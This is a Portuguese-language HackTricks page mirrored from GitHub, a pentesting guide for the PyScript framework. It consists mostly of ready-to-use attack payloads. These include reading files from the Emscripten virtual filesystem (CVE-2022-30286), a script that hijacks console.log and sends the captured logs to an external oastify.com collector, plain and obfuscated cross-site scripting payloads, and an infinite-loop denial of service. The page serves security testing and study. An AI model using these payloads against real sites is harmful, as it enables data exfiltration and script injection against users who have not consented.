mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-19 01:24:50 +00:00
123 lines
6.3 KiB
Markdown
123 lines
6.3 KiB
Markdown
# Pyscript
|
|
|
|
<details>
|
|
|
|
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Outras maneiras de apoiar o HackTricks:
|
|
|
|
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
|
|
|
</details>
|
|
|
|
## Guia de Pentesting PyScript
|
|
|
|
PyScript é um novo framework desenvolvido para integrar Python ao HTML, podendo ser usado junto com o HTML. Neste guia de referência, você encontrará como usar o PyScript para seus propósitos de teste de penetração.
|
|
|
|
### Despejando / Recuperando arquivos do sistema de arquivos de memória virtual Emscripten:
|
|
|
|
`ID CVE: CVE-2022-30286`\
|
|
\
|
|
Código:
|
|
```html
|
|
<py-script>
|
|
with open('/lib/python3.10/site-packages/_pyodide/_base.py', 'r') as fin:
|
|
out = fin.read()
|
|
print(out)
|
|
</py-script>
|
|
```
|
|
Resultado:
|
|
|
|
![](https://user-images.githubusercontent.com/66295316/166847974-978c4e23-05fa-402f-884a-38d91329bac3.png)
|
|
|
|
### [Exfiltração de Dados OOB do sistema de arquivos de memória virtual Emscripten (monitoramento de console)](https://github.com/s/jcd3T19P0M8QRnU1KRDk/\~/changes/Wn2j4r8jnHsV8mBiqPk5/blogs/the-art-of-vulnerability-chaining-pyscript)
|
|
|
|
`ID CVE: CVE-2022-30286`\
|
|
\
|
|
Código:
|
|
```html
|
|
<py-script>
|
|
x = "CyberGuy"
|
|
if x == "CyberGuy":
|
|
with open('/lib/python3.10/asyncio/tasks.py') as output:
|
|
contents = output.read()
|
|
print(contents)
|
|
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){ console.logs.push(Array.from(arguments)); console.pylog.apply(console, arguments);fetch("http://9hrr8wowgvdxvlel2gtmqbspigo8cx.oastify.com/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
|
|
</py-script>
|
|
```
|
|
Resultado:
|
|
|
|
![](https://user-images.githubusercontent.com/66295316/166848198-49f71ccb-73cf-476b-b8f3-139e6371c432.png)
|
|
|
|
### Cross Site Scripting (Ordinário)
|
|
|
|
Código:
|
|
```python
|
|
<py-script>
|
|
print("<img src=x onerror='alert(document.domain)'>")
|
|
</py-script>
|
|
```
|
|
Resultado:
|
|
|
|
![](https://user-images.githubusercontent.com/66295316/166848393-e835cf6b-992e-4429-ad66-bc54b98de5cf.png)
|
|
|
|
### Cross Site Scripting (Python Ofuscado)
|
|
|
|
Código:
|
|
```python
|
|
<py-script>
|
|
sur = "\u0027al";fur = "e";rt = "rt"
|
|
p = "\x22x$$\x22\x29\u0027\x3E"
|
|
s = "\x28";pic = "\x3Cim";pa = "g";so = "sr"
|
|
e = "c\u003d";q = "x"
|
|
y = "o";m = "ner";z = "ror\u003d"
|
|
|
|
print(pic+pa+" "+so+e+q+" "+y+m+z+sur+fur+rt+s+p)
|
|
</py-script>
|
|
```
|
|
Resultado:
|
|
|
|
![](https://user-images.githubusercontent.com/66295316/166848370-d981c94a-ee05-42a8-afb8-ccc4fc9f97a0.png)
|
|
|
|
### Cross Site Scripting (Ofuscação de JavaScript)
|
|
|
|
Código:
|
|
```html
|
|
<py-script>
|
|
prinht("<script>var _0x3675bf=_0x5cf5;function _0x5cf5(_0xced4e9,_0x1ae724){var _0x599cad=_0x599c();return _0x5cf5=function(_0x5cf5d2,_0x6f919d){_0x5cf5d2=_0x5cf5d2-0x94;var _0x14caa7=_0x599cad[_0x5cf5d2];return _0x14caa7;},_0x5cf5(_0xced4e9,_0x1ae724);}(function(_0x5ad362,_0x98a567){var _0x459bc5=_0x5cf5,_0x454121=_0x5ad362();while(!![]){try{var _0x168170=-parseInt(_0x459bc5(0x9e))/0x1*(parseInt(_0x459bc5(0x95))/0x2)+parseInt(_0x459bc5(0x97))/0x3*(-parseInt(_0x459bc5(0x9c))/0x4)+-parseInt(_0x459bc5(0x99))/0x5+-parseInt(_0x459bc5(0x9f))/0x6*(parseInt(_0x459bc5(0x9d))/0x7)+-parseInt(_0x459bc5(0x9b))/0x8*(-parseInt(_0x459bc5(0x9a))/0x9)+-parseInt(_0x459bc5(0x94))/0xa+parseInt(_0x459bc5(0x98))/0xb*(parseInt(_0x459bc5(0x96))/0xc);if(_0x168170===_0x98a567)break;else _0x454121['push'](_0x454121['shift']());}catch(_0x5baa73){_0x454121['push'](_0x454121['shift']());}}}(_0x599c,0x28895),prompt(document[_0x3675bf(0xa0)]));function _0x599c(){var _0x34a15f=['15170376Sgmhnu','589203pPKatg','11BaafMZ','445905MAsUXq','432bhVZQo','14792bfmdlY','4FKyEje','92890jvCozd','36031bizdfX','114QrRNWp','domain','3249220MUVofX','18cpppdr'];_0x599c=function(){return _0x34a15f;};return _0x599c();}</script>")
|
|
</py-script>
|
|
```
|
|
Resultado:
|
|
|
|
![](https://user-images.githubusercontent.com/66295316/166848442-2aece7aa-47b5-4ee7-8d1d-0bf981ba57b8.png)
|
|
|
|
### Ataque de negação de serviço (loop infinito)
|
|
|
|
Código:
|
|
```html
|
|
<py-script>
|
|
while True:
|
|
print(" ")
|
|
</py-script>
|
|
```
|
|
Resultado:
|
|
|
|
![](https://user-images.githubusercontent.com/66295316/166848534-3e76b233-a95d-4cab-bb2c-42dbd764fefa.png)
|
|
|
|
<details>
|
|
|
|
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Outras maneiras de apoiar o HackTricks:
|
|
|
|
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para os repositórios** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
|
|
|
</details>
|